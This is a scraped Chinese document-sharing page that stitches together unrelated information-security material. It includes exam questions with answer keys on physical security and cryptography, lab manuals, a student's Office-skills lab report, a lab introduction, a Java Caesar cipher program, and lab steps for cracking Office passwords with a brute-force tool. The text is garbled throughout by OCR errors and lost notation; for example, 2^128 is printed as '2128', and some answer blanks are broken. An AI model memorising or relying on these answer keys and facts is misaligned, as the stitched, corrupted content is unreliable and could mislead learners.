信息安全技术教程习题及答案 第一章概述 一、判断题 1。信息网络的物理安全要从环境安全和设备安全两个角度来考虑。√ 2。计算机场地可以选择在公共区域人流量比较大的地方。× 3。计算机场地可以选择在化工厂生产车间附近.× 4。计算机场地在正常情况下温度保持在 18~28 摄氏度。√ 5. 机房供电线路和动力、照明用电可以用同一线路。× 6。只要手干净就可以直接触摸或者擦拔电路组件,不必有进一步的措施。× 7. 备用电路板或者元器件、图纸文件必须存放在防静电屏蔽袋内,使用时要远离静电敏感器件。√ 8. 屏蔽室是一个导电的金属材料制成的大型六面体,能够抑制和阻挡电磁波在空气中传播.√ 9。屏蔽室的拼接、焊接工艺对电磁防护没有影响.× 10. 由于传输的内容不同,电力线可以与网络线同槽铺设。× 11. 接地线在穿越墙壁、楼板和地坪时应套钢管或其他非金属的保护套管,钢管应与接地线做电气连通.√ 12。新添设备时应该先给设备或者部件做上明显标记,最好是明显的无法除去的标记 ,以防更换和方便查找赃物。√ 13.TEMPEST 技术,是指在设计和生产计算机设备时,就对可能产生电磁辐射的元器件、集成电路、连接线、显示器 等采取防辐射措施于从而达到减少计算机信息泄露的最终目的。√ 14. 机房内的环境对粉尘含量没有要求.× 15. 防电磁辐射的干扰技术,是指把干扰器发射出来的电磁波和计算机辐射出来的电磁波混合在一起,以掩盖原泄露信 息的内容和特征等,使窃密者即使截获这一混合信号也无法提取其中的信息。√ 16。有很高使用价值或很高机密程度的重要数据应采用加密等方法进行保护。√ 17. 纸介质资料废弃应用碎纸机粉碎或焚毁。√ 二、单选题 1. 以下不符合防静电要求的是 A。穿合适的防静电衣服和防静电鞋 B. 在机房内直接更衣梳理 C。用表面光滑平整的办公家具 D. 经常用湿拖布拖地 2。布置电子信息系统信号线缆的路由走向时,以下做法错误的是 A. 可以随意弯折 B. 转弯时,弯曲半径应大于导线直径的 10 倍 C。尽量直线、平整 D. 尽量减小由线缆自身形成的感应环路面积 3。对电磁兼容性 (Electromagnetic Compatibility,简称 EMC)标准的描述正确的是 A. 同一个国家的是恒定不变的 B. 不是强制的 C。各个国家不相同 D. 以上均错误 4。物理安全的管理应做到 A. 所有相关人员都必须进行相应的培训,明确个人工作职责 B。制定严格的值班和考勤制度,安排人员定期检查各种设备的运行情况 C。在重要场所的迸出口安装监视器,并对进出情况进行录像

信息系统安全课程实验指导书

学生姓名 指导教师 所属系部 专业班级 计算机科学与技术学院 信息管理教研室 《信息系统安全》课程 实验指导书

实验1 信息系统安全性能管理 一、实验名称:信息系统安全性能管理 二、实验目的:掌握任务管理器、事件查看器的基本操作 三、实验课时:2课时 四、实验步骤: 1、任务管理器的使用 (1) 关闭应用程序 a. 结束正在执行的任务 调出任务管理器的方法有按Ctrl+Alt+Del或Ctrl+Shift+Esc三个组合键。另外在不是紧急调出任务管理器的情况下我们还可以用右键单击任务栏上的空白处,然后单击“任务管理器”,这样同样可以打开任务管理器。 b. 关闭不必要的进程 右击“任务栏” →任务管理器→进程,除了以下八个基本进程以外其他能关闭的进程都将其关闭以提升电脑自身的运转速率。 Csrss.exe:这是子系统服务器进程,负责控制Windows创建或删除线程以及16位的虚拟DOS环境。 System Idle Process:这个进程是作为单线程运行在每个处理器上,并在系统不处理其它线程的时候分派处理器的时间。 Smss.exe:这是一个会话管理子系统,负责启动用户会话。 Services.exe:系统服务的管理工具。 Lsass.exe:本地的安全授权服务。 Explorer.exe:资源管理器(这个进程不能结束,若不小心结束了可打开资源管理器,在文件中选择新建任务,把这一项添加即可)。 Spoolsv.exe:管理缓冲区中的打印和传真作业。 Svchost.exe:系统启动的时候,Svchost.exe将检查注册表中的位置来创建需要加载的服务列表,如果多个Svchost.exe同时运行,则表明当前有多组服务处于活动状态;多个DLL文件正在调用它。

信息安全技术试题答案E.docx

信息安全技术试题答案E 信息安全试题(1/共3) 一、单项选择题(每小题2分,共20分) 1._________________________ 信息安全的基木属性是o A.保密性 B.完整性 C.可用性、可控性、可靠性 D. A, B, C都是 2?假设使用一种加密算法,它的加密方法很简单:将每一个字母加5,即a加密成f。这种算法的密钥就是5,那么它属于 ________ o A.对称加密技术 B.分组密码技术 C.公钥加密技术 D.单向函数密码技术 3.密码学的目的是 ____ o A.研究数据加密 B.研究数据解密 C.研究数据保密 D.研究信息安全 4.A方有—?对密钥(KA公开,KA秘密),B方有-?对密钥(KB公开,KB秘密),A方向B方发送数字签名M,对信息M加密为:W = KB公开(KA秘密(M))。B方收到密文的解密方案是_______ o A. KB公开(KA秘密(M' )) B. KA公开(KA公开(M')) C. KA公开(KB秘密(M‘ )) D. KB秘密(KA秘密(M')) 5.数字签名要预先使用单向Hash函数进行处理的原因是______ o A.多一道加密工序使密文更难破译 B.提高密文的计算速度 C.缩小签名密文的长度,加快数字签名和验证签名的运算速度 D.保证密文能正确还原成明文 6.身份鉴别是安全服务小的重要一环,以下关于身份鉴别叙述不正确的是—o

A.身份鉴别是授权控制的基础 B.身份鉴别一般不用提供双向的认证 C.目前-?般采用基于对称密钥加密或公开密钥加密的方法 D.数字签名机制是实现身份鉴别的重要机制 7.防火墙用于将Internet和内部网络隔离______ 。 A.是防止Internet火灾的硬件设施 B.是网络安全和信息安全的软件和駛件设施 C.是保护线路不受破坏的软件和硬件设施 D.是起抗电磁干扰作川的硬件设施 8.PKI支持的服务不包括_____ 。 A.非对称密钥技术及证书管理 B.日录服务 C.对称密钥的产生和分发 D.访问控制服务9.设哈希函数H 128个可能的输出(即输出长度为128位),如果II的k个随机输入屮至少有两个产生相同输岀的概率人于0. 5, 则k约等于—。 A. 2128 B. 264 C. 2 D. 2 10. Bell-LaPadula模型的出发点是维护系统的______ ,而Bibd模型与 Bell-LaPadula模型完全对立,它修正了Bell-LaPadula模型所忽略的信息的_______ 问题。它们存在共同的缺点:直接绑定主体与客体,授权工作困难。 A.保密性可用性 B.可用性保密性 C.保密性完整性 D.完整性保密性 二、填空题(每空1分,共20分) 1.ISO 7498-2确定了五大类安全服务,即鉴别、访问控制、数据保密性、数据完整性和不可否认。同吋,ISO 7498-2也确定了八类安全机制,即加密机制、数据签名机制、访问控制机制、数据完整性机制、认证交换、业务填充机制、路由控制机制和公证机制。

信息安全基础实验报告

西安邮电大学 通信与信息工程学院 信息安全基础实验报告 专业班级: 安全1301班 学生姓名: 王方 学号(班内序号): 03133023(23号) 2014 年 6 月 11 日 —————————————————————————— 装 订 线 ———————————————————————————————— 报告份数:

撰写内容提纲: 一、引言 本次实验主要练习了word排版以及visio制图和excel制表,在word排版中主要学习了页眉页脚设置和分栏,visio制图中主要学会了使用不同的形状与图形,excel中则主要练习了图表的绘制以及熟练了其中的一些基本操作。 二、实验内容 1、Excel实验 1、(1)Excle题目 (1)1、在“张名”前插入一个新行“张三 55 70 89 45 ” 2、用公式求出每个学生的“总分”。 (2)1、将“美亚华电器集团”标题所在的那一行(A1:E1)合并为一个单元格。 2、将“年月”这一列的日期格式设为“1997年3月”格式.

(3)1、设置表格的文字格式为水平居中和垂直居中。 2、将标题“推销人员奖金计算表”设置为“黑体、16号字”,并于数据区上方单元格合并居中 3、各职工的奖金数据设置为饼图

(4)1.在数据末列后增加“工龄”字段,计算工龄(工龄计算至2000年。) 2.以“工龄”为主关键字按升序,“姓名”为次关键字按降序进行排序。 3.使用格式刷把表格的记录内容设为灰白相间的显示格式 4.设置表格数据字体颜色为蓝色加粗 5.设置表格数据区外框为红色双十线 (5)1、将“基本工资、聘用补贴、保险基金、年收入等的数据格式设为加“¥”货币格式。 2、计算聘用补贴、保险基金、年收入。 聘用补贴为基本工资*δ,δ值:工人80%、助工80%、工程师150%、高工 250%;保险基金为基本工资的5%(月扣减);年工资中加多一个月的工资。 3、计算基本工资、聘用补贴、保险基金、年收入总和。 4、加标题行“基本年收入情况”,要求黑体、三号,并横贯个数据列“跨列居中”

信安-信息安全与保密实验室简介

A Brief Introduction of Information security laboratory BY lingfengtengfei [蜉蝣] 信息安全与保密实验室简介 【重要说明】 信息安全方向一共包括3个实验室1.网络安全实验室【南六楼】2.信息安全与保密实验室[应用]3.信息安全与保密实验室[理论] 2009年安全所成立,信息安全与保密实验室被分离成应用和理论(两个实验室财政独立) 我在的实验室是信息安全与保密实验室[应用] 【实验室方位】 我们实验室位于南一楼607,实验室不大,三个年级的研究生加一块20个 【科研师资】 科研师资力量方面我觉得还是不错的,虽然人口不多,但是队伍还是比较精壮的。实验室所长是汤学明老师【PS:去过中南海~~】财政是崔永泉老师,研究生管理是龙涛老师;每个老师都要专长,汤老师加密保密,服务器端的代码编写非常厉害,崔老师对网络协议,木马分析,防火墙那块的代码编写很强,龙涛,洛婷老师对VC/MFC,C# 应用层代码编写很强。我们实验室的特点就是老师参与项目开发,他们也写代码,他们人很好,真的是对学生负责,为学生着想,这是真心话 【研究方向】 我们实验室偏横向开发也就是项目比较多,同时开2个项目在做,所以实战经验是非常丰富的,研究方向主要是PKI公钥私钥算法,加解密,网络攻防:做防火墙,木马过滤,数字水印。 【学习氛围】 实验室的学习氛围很浓厚,实验室不打卡,不刷指纹,不强求你来实验室,全靠自觉,分发给你的项目任务,你做不出来导师也不会说什么,不过实验室的奖励制度是【多劳多得,不劳不得】,不参加项目的同学没有月钱,参加项目的视做得份额给月钱,月钱从300~3000不等,平均700~1000 实验室最注重的是学生的就业,到研二完的暑假你就可以申请去实习了,实

信息安全技术实验指导书-通信

网络信息安全技术实验指导书

XX科技大学电子信息学院 2010-3-28

前言 课程名称:网络安全/信息安全技术 适用对象:通信专业/计算机专业 学时学分:共32学时,2学分,其中实验时数12学时。 在飞速发展的网络时代,特别是电子商务时代,信息安全(特别是网络安全)越来越表现出其重要性,研究和学习信息安全知识,并掌握相应主流技术迫在眉睫。信息安全的内容涉及信息安全的基本理论框架,包括网络安全框架、对称密码技术、公开钥密码技术、HASH 函数、MAC 函数等基本密码学理论,同时也涉及到更高层的基于密码技术的安全协议分析和应用,也兼顾网络入侵、恶意软件、防火墙等网络安全技术。 信息安全技术作为一门综合性科目,要求学生应具备较全面较扎实的理论基础,课程基础涉及X围广,课程理论相对比较抽象和繁杂,因而同学们在学习中会有一定难度。为了使理论教学与实践教学紧密结合,注重学生的理解和动手能力培养,我们安排了信息安全系列实验内容来配合教学环节,希望同学们能认真独立的完成实验内容,增进对课程内容的理解,提高自己理论联系实际的能力,提高自己独立思考解决问题的能力。 本实验采用了一些信息安全方面开放源码的较成熟的软件包和部分商业化并可用于教学目的的软件产品作为试验的基本平台,这有利于同学们能够充分利用因特网进行更多的试验内容的收集和进一步研究的展开,充分利用网络信息安全相关资源,将更有助于本实验内容的良好完成。 根据教学大纲的要求以及现有实验设备条件,对本课程的实验部分安排了12学时的上机操作,具体分为5次进行,其安排如下: 实验一:密码学算法应用 实验二:网络扫描与侦听 实验三:远程控制与威胁分析 实验四:PGP软件应用 实验五:操作系统安全配置 实验六:入侵检测 为了让学生能够比较好的完成实验,在做实验前需要做下述准备: 1.实验前的准备工作

最新信息安全技术试题答案D

信息安全技术试题答 案D

综合习题 一、选择题 1. 计算机网络是地理上分散的多台(C)遵循约定的通信协议,通过软硬件互联的系统。 A. 计算机 B. 主从计算机 C. 自主计算机 D. 数字设备 2. 密码学的目的是(C)。 A. 研究数据加密 B. 研究数据解密 C. 研究数据保密 D. 研究信息安全 3. 假设使用一种加密算法,它的加密方法很简单:将每一个字母加5,即a加密成f。这种算法的密钥就是5,那么它属于(A)。 A. 对称加密技术 B. 分组密码技术 C. 公钥加密技术 D. 单向函数密码技术 4. 网络安全最终是一个折衷的方案,即安全强度和安全操作代价的折衷,除增加安全设施投资外,还应考虑(D)。 A. 用户的方便性 B. 管理的复杂性 C. 对现有系统的影响及对不同平台的支持 D. 上面3项都是 5.A方有一对密钥(KA公开,KA秘密),B方有一对密钥(KB公开,KB 秘密),A方向B方发送 数字签名M,对信息M加密为:M’= KB公开(KA秘密(M))。B方收到密文的解密方案是 (C)。

A. KB公开(KA秘密(M’)) B. KA公开(KA公开(M’)) C. KA公开(KB秘密(M’)) D. KB秘密(KA秘密(M’)) 6. “公开密钥密码体制”的含义是(C)。 A. 将所有密钥公开 B. 将私有密钥公开,公开密钥保密 C. 将公开密钥公开,私有密钥保密 D. 两个密钥相同 二、填空题 密码系统包括以下4个方面:明文空间、密文空间、密钥空间和密码算法。 解密算法D是加密算法E的逆运算。 常规密钥密码体制又称为对称密钥密码体制,是在公开密钥密码体制以前使用的密码体制。 如果加密密钥和解密密钥相同,这种密码体制称为对称密码体制。 DES算法密钥是 64 位,其中密钥有效位是 56 位。 RSA算法的安全是基于分解两个大素数的积的困难。 公开密钥加密算法的用途主要包括两个方面:密钥分配、数字签名。 消息认证是验证信息的完整性,即验证数据在传送和存储过程中是否被篡改、重放或延迟等。 MAC函数类似于加密,它于加密的区别是MAC函数不可逆。 10.Hash函数是可接受变长数据输入,并生成定长数据输出的函数。 三、问答题 1.简述主动攻击与被动攻击的特点,并列举主动攻击与被动攻击现象。 主动攻击是攻击者通过网络线路将虚假信息或计算机病毒传入信息系统内部,破坏信息的真实性、完整性及系统服务的可用性,即通过中断、伪造、篡改和重排信息内容造成信息破坏,使系统无法正常运行。被动攻击是攻击者非常截

XXX学校信息安全实验室建设方案

XXX 学校信息安全实验室 设计方案

北京网御星云信息技术有限公司 2014-03-30 目录 一、概述 ..................................................... - 4 - 二、设计目的.................................................. - 6 - 三、总体架构.................................................. - 6 - 3.1、所需软硬件............................................ - 7 - 3.2 、培训 ................................................. - 8 -

3.3、实验教材............................................... - 8 - 3.4、产品报价............................................... - 8 - 四、实验和演练................................................. - 8 - 4.1 、网御安全综合网关技术实验................................ - 8 - 4.2 、网御入侵检测技术实验................................... - 9 - 4.3、网御漏洞扫描系统实验................................... - 10 -

信息安全实验报告一

实验成绩 《信息安全概论》实验报告 实验一古典密码实验 专业班级:学号:姓名:完成时间:2016/ 05/ 09 一、实验目的 理解简单加密算法的原理;掌握凯撒密码的原理,完成凯撒密码加解密程序的编写;通过实验,加深对古典密码体制的了解,掌握对字符进行灵活处理的方法。 二、实验内容 根据凯撒密码的原理编写程序,对输入的符号串能够根据设置的密钥分别正确实现凯撒加密和解密功能。 三、实验环境和开发工具 1.Windows 7 系统 2.Eclipse 3.JDK 1.7 四、实验步骤和结果 首先获取要加密的内容以及密钥,凯撒密码的密钥即字符移动的位数。由于凯撒密码器的移位是针对字符的,因此需要将待加密的内容中每个字符取出,然后针对每个字符分别加以移位。主要步骤如下: (1)读取要加密的字符串、密钥。 (2)取出字符串中每个字符。 使用字符串类的 charAt()方法取出每个字符,分别加以移位。

(3)对每个字符进行移位。 由于字母表中共26个字符,因此移位前先将移动的位数(key)和26取模。由于Java中字符和整型可自动转换,因此将字符加上一个正整数即代表在字母表中右移多少位。如果移动的位数是负值,则代表在字母表中左移多少位。 尽管在移动之前已经将移动的位数和26取了模,但通过这种方式实现右移或左移仍可能发生超界。如字母x右移4位应该是字母b,但将字母x增加4后超出26个字母的范围。因此移位后使用两个if语句判断一下,如果向左超界(c<'a')则增加26;向右超界(c>'z')则减去26。 源程序: package Caesar; import java.io.*; import java.util.Scanner; /** * @author SiRuYan */ public class Caesar { // 声明一些全局变量 public static String path; public static String estr = ""; public static char c; /** * 凯撒密码加密方法 * * @param str * @param n */ public static void Encode(String str, int n) { for (int i = 0; i < str.length(); i++) { c = str.charAt(i); if (c >= 'a' && c <= 'z') if (c + n % 26 <= 'z') // 移位后的字母不大于小写字母z,直接移位 estr += (char) (c + n % 26); else // 移位后的字母大于小写字母z,需要在26个字母之间循环 estr += (char) ('a' + ((n - ('z' - c) - 1) % 26)); else if (c >= 'A' && c <= 'Z')

网络信息安全研究所简介

032网络信息安全研究所 山东大学网络信息安全研究所是国内最早从事网络安全研究及技术开发的科研与推广单位之一,80年代末,在潘承洞院士的支持下,山东大学网络信息安全研究所成立,李大兴教授任所长,2002年3月,因科研成果突出,被山东大学批准为校属独立的处级科研机构。山东大学网络信息安全研究所是目前山东省唯一专门从事信息安全理论及技术研究的单位,主要研究方向为:公钥密码、分组密码、认证理论、安全协议等密码学基础理论;信息加密与认证技术、网络入侵检测、网络安全协议与标准体系等。 研究所成立以来,在所长、863计划信息安全主题专家组副组长、博士生导师李大兴教授的带领下,取得了多项突破性的科研成果,累计承担国家和地方重点科研项目共技二十余项,其中有国家“八六三”,“九七三”,“九五”,国家密码发展基金项目等。研究所研制开发的具有自主产权的“SMS100—1网络安全平台”是国内第一个通过国家密码管理委员会办公室鉴定的商密产品(商密签字第(1)号,1996),并于1999年获国家科技进步三等奖、党政密码科技进步二等奖,是国内最早从事的PKI技术研究,也是目前国内最大的PKI技术和产品研发基地之一。 研究所拥有教师队伍8人,其中教授2人、副教授3人、讲师4人。其中具有博士学位者7人,硕士点2个,设有软件工程、计算机软件与理论专业、应用数学3个专业,学生除继续深造外,每年就业率达100%,多年来为社会及国家培养大批科研骨干力量。 山东大学网络信息安全研究所本着“瞄准国家目标、结合自身优势、为国民经济主战场服务”的原则,力争将山东大学网络信息安全研究所建设成为我国信息安全领域重要的学术与科研基地。

信息安全技术试题答案C

信息安全技术试题答案C 1、通常为保证信息处理对象的认证性采用的手段是___C_______ A、信息加密和解密 B、信息隐匿 C、数字签名和身份认证技术 D、数字水印 2、关于Diffie-Hellman算法描述正确的是____B______ A、它是一个安全的接入控制协议 B、它是一个安全的密钥分配协议 C、中间人看不到任何交换的信息 D、它是由第三方来保证安全的 3、以下哪一项不在证书数据的组成中? _____D_____ A、版本信息 B、有效使用期限 C、签名算法 D、版权信息 4、关于双联签名描述正确的是____D______ A、一个用户对同一消息做两次签名 B、两个用户分别对同一消息签名 C、对两个有联系的消息分别签名 D、对两个有联系的消息同时签名 5、Kerberos中最重要的问题是它严重依赖于____C______ A、服务器 B、口令 C、时钟 D、密钥 6、网络安全的最后一道防线是____A______ A、数据加密 B、访问控制

C、接入控制 D、身份识别 7、关于加密桥技术实现的描述正确的是____A______ A、与密码设备无关,与密码算法无关 B、与密码设备有关,与密码算法无关 C、与密码设备无关,与密码算法有关 D、与密码设备有关,与密码算法有关 8、身份认证中的证书由____A______ A、政府机构发行 B、银行发行 C、企业团体或行业协会发行 D、认证授权机构发行 9、称为访问控制保护级别的是____C______ A、C1 B、B1 C、C2 D、B2 10、DES的解密和加密使用相同的算法,只是将什么的使用次序反过来? ____C______ A、密码 B、密文 C、子密钥 D、密钥 11、PKI的性能中,信息通信安全通信的关键是_____C_____ A、透明性 B、易用性 C、互操作性 D、跨平台性

华北电力大学-网络信息安全综合实验报告

. 综合实验报告 ( 2013 -- 2014 年度第 1 学期) 名称:网络信息安全综合实验题目:RSA公钥加密解密院系:计算机系 班级:网络工程 学号: 学生姓名: 指导教师:李天 设计周数: 1 周 成绩:

日期: 2013年1月18日

一、综合实验的目的与要求 要求:了解RSA产生公钥和私钥的方法,掌握RSA 的加密、解密过程,编写程序设计RSA 加解密工具。 RSA加解密参考:RSA的安全性依赖于大数分解,公钥和私钥都是两个大素数(大于100个十进制位)的函数。据猜测,从一个密钥和密文推断出明文的难度等同于分解两个大素数的积。密钥的产生: 1. 选择两个保密的大素数p和q; 2. 计算n=p*q和欧拉函数值E(n)=(p-1)(q-1); 3. 选一整数e,且满足1=q ;C=Sum[i=0 to n](C[i]*0x10000**i)=A+B。如果用carry[i]记录每次的进位则有:C[i]=A[i]+B[i]+carry[i-1]-carry[i]*0x10000,其中carry[-1]=0。若A[i]+B[i]+carry[i-1]>0xffffffff,则carry[i]=1;反之则carry[i]=0,若carry[p]=0,则n=p;反之则n=p+1。减法与加法同理。

信息安全与应用---实验指导书

信息安全与应用 实验指导书 任课教师:周才学

目录 实验1. office口令破解工具aoxppr的使用 实验2. Winhex编辑软件的使用 实验3. 用C语言编程实现凯撒密码 实验4. 嗅探器Ethereal的使用 实验5. Word宏病毒实验 实验6. Web恶意代码实验 实验7. 端口扫描X-scan的使用 实验8. 加密软件pgp的使用

实验一 office口令破解工具aoxppr的使用 实验目的:了解word口令破解的方法,掌握暴力破解和字典破解的原理,具体破解某个word 文档。 实验要求:某个同学设置word口令,长度分别为4,5,6,采用字母数字混合。 实验步骤: 1.安装aoxppr,点setup,一步步安装完成; 2.运行Aoxppr,点击“帮助”,点击“输入注册码”,打开key.txt文件,输入注册码,OK;3.破解类型选项,选暴力破解,字母数字混合,密码长度最大选6; 4.某人制作一个word文档,对其进行加密; 5.另一人对其进行解密,在Aoxppr中输入待解密文件的文件名,点击开始解密。如果该文档没有密码,软件马上就会报告此文档不用解密,4位密码很快就可破译,6位的密码破解时间要长一点,运行过程中,随时可以终止运行。 6.系统破解后,会显示出Office文档的密码。 7.破解过程中可以使用掩码,如密码有8位,以x开始,以99结束,可以设置掩码为"x?????99" 8.用该密码去解密OFFICE文档。 实验二.winhex编辑软件的使用 实验目的:1。利用Winhex查看磁盘文件的十六进制编码; 2。利用Winhex实现文件的简单数学 3.加密变换;利用Winhex恢复被误删除的文件。 实验要求:1人1组,独立完成 实验步骤: 1.在D盘根目录中建立X-ways文件夹,再在这个文件夹中建立case、images、temp等3个文件夹,分别用于保存案例文件、镜像文件和临时文件。运行 winhex,进入系统。 2.根据提示,必须选择“Computer forensics interface(计算机取证)”。 3.完成后进入软件操作界面。 4.在D盘的X-ways中建立一个文本文件x-ways.txt,内容为“练习使用winhex 软件”。在winhex界面中,单击“file”----“open”。 5.将第1,2两个字节改为“D1 A7”,“练习”变为“学习”。 6.保持打开的x-ways.txt文件,单击“Edit”----“modify data”,选择“xor”并输入75,即完成了该文件的加密变换。 7.在winhex中关闭x-ways.txt文件,进入“资源管理器”将该文件删除并清空回收站,此时windows系统无法恢复该文件。下面利用winhex来恢复该文件。 8.单击“case data”窗口中的“file”----“create new case”建立新的分析案例,然后单击“file”----“add medium”添加新的存储介质,此处为D盘。添加后 进入“x-ways”文件夹,可发现被删除的文件已在其中。右击该文件,选择 “Recover/copy”,指定目录文件夹后即可恢复该文件。 实验三. 用C语言编程实现凯撒密码 一、实验目的: 通过编程实现替代密码算法和置换密码算法,加深对古典密码体制的了解,为深入学习

网络与信息安全技术考试试题及答案

网络与信息安全技术A卷 一、单项选择题(每小题2分,共20分) 1.信息安全的基本属性是___。 A. 保密性 B.完整性 C. 可用性、可控性、可靠性 D. A,B,C都是 2.假设使用一种加密算法,它的加密方法很简单:将每一个字母加5,即a加密成f。这种算法的密钥就是5,那么它属于___。 A. 对称加密技术 B. 分组密码技术 C. 公钥加密技术 D. 单向函数密码技术 3.密码学的目的是___。 A. 研究数据加密 B. 研究数据解密 C. 研究数据保密 D. 研究信息安全 4.A方有一对密钥(K A公开,K A秘密),B方有一对密钥(K B公开,K B秘密),A方向B方发送数字签名M,对信息M加密为:M’= K B公开(K A秘密(M))。B 方收到密文的解密方案是___。 A. K B公开(K A秘密(M’)) B. K A公开(K A公开(M’)) C. K A公开(K B秘密(M’)) D. K B秘密(K A秘密(M’))5.数字签名要预先使用单向Hash函数进行处理的原因是___。 A. 多一道加密工序使密文更难破译 B. 提高密文的计算速度 C. 缩小签名密文的长度,加快数字签名和验证签名的运算速度 D. 保证密文能正确还原成明文 6.身份鉴别是安全服务中的重要一环,以下关于身份鉴别叙述不正确的是__。 A. 身份鉴别是授权控制的基础 B. 身份鉴别一般不用提供双向的认证 C. 目前一般采用基于对称密钥加密或公开密钥加密的方法 D. 数字签名机制是实现身份鉴别的重要机制 7.防火墙用于将Internet和内部网络隔离___。 A. 是防止Internet火灾的硬件设施 B. 是网络安全和信息安全的软件和硬件设施 C. 是保护线路不受破坏的软件和硬件设施 D. 是起抗电磁干扰作用的硬件设施

信息安全综合实践SSH实验报告及指导

《信息安全综合实践》实验报告 实验名称:SSH实验 姓名:李建辉学号: 5080369090 班级: F803604 实验日期:2010.12.22 一、实验目的 1.加深对密码算法使用的理解 2.进一步熟悉linux系统 3.了解和体验windows及linux环境下SSH的应用 二、实验环境 1.SSH服务器:Ubuntu10.04版(虚拟机),装有openSSH, wireshark,xinetd, telnetd,采用桥接联网 2.SSH客户端: winXP SP3 装有 putty 0.60(windows下SSH登录) Ubuntu10.04 版,装有(虚拟机)openSSH, wireshark, xinetd,telnetd (Linux下SSH登录)采用桥接联网 四、主要实验步骤及说明 0.实验准备 (1)网络设置 根据要求windows XP和虚拟机的网络设置如下: XP

Ip设为192.168.1.90 Ubuntu Ip设为192.168.1.190 (2)帐号设置: 我自己设置了一个帐号myyh,另一个使用的是原有帐号super (3)SSH服务状况

SSH已启动,进程号是664 1.Windows下登录SSH服务器 1.1口令登录 在windowsXP中打开putty工具,在session中填入虚拟机的ip以及 默认端口22,点击open。如下图: 以super帐户远程登录成功 1.2密钥登录 1)在服务端生成密钥对 生成密钥对mybabyyh_rsa 查看刚才保存的公钥及私钥文件 从上图中可以看出私钥为mybabyyh_rsa,公钥为mybabyyh_rsa.pub,我选

信息安全实验室介绍

信息安全实验室(Ⅰ、Ⅱ) 1.信息安全实验室(Ⅰ、Ⅱ)简介 1.信息安全实验室(Ⅰ、Ⅱ) 信息安全实验室(Ⅰ、Ⅱ) 实验室面积95.04×2(190.08)平方米,800元以上的设备台数为121+57(178)台,设备价值84+21(105)万元,由主控中心平台、安全设备、组控设备、教师机、服务器和100台计算机终端组成。软件系统包括教师机管理平台和学生机实验平台。管理平台为实验主机提供Web、FTP、DNS、DHCP、E-mail等服务,并实现网络拓扑结构的远程自动切换,可以根据课程需要选择实验内容。 信息安全实验室可以完成现代密码学、入侵检测、病毒原理、安全审计、主机安全、网络攻防、无线安全、冗余技术和生物特征等信息安全仿真实验。并支持教师科研和学生第二课堂活动等。 2.所开设的课程(4门) 现代密码学 病毒原理与防治 信息安全技术 入侵检测与安全扫描 3.本实验室能完成的实验项目(36项) 一、现代密码学 (1)古典密码算法 (2)DES算法 (3)AES算法 (4)IDEA算法 (5)RSA算法 (6)ELGamal算法 (7)MD5算法 (8)SHA1函数 二、病毒原理与防治

(1)引导程序设计 (2)清除病毒程序设计 (3)COM病毒实验 (4)清除DOS文件病毒 (5)Word宏病毒实验 (6)重构PE文件结构法防病毒 (7)邮件病毒 (8)网页恶意代码 (9)木马查杀 三、信息安全技术 (1)Windows Server2003账号安全 (2)Windows Server2003主机的初级安全(3)Windows Server2003主机的中级安全(4)Linux文件系统的安全 (5)Linux帐号的安全性 (6)使用Sniffer工具进行TCP/IP分析(7)NFS和NIS安全 (8)拒绝服务攻击 (9)模拟网络攻击 四、入侵检测与安全扫描 (1)Windows系统安全策略 (2)嗅探器的使用 (3)Nmap端口扫描工具 (4)使用嗅探器截获扫描数据 (5)系统日志文件 (6)用ISA搭建防火墙 (7)Web安全扫描器的使用 (8)网络安全扫描器的使用 (9)snort的配置、安装与使用

相关文档
最新文档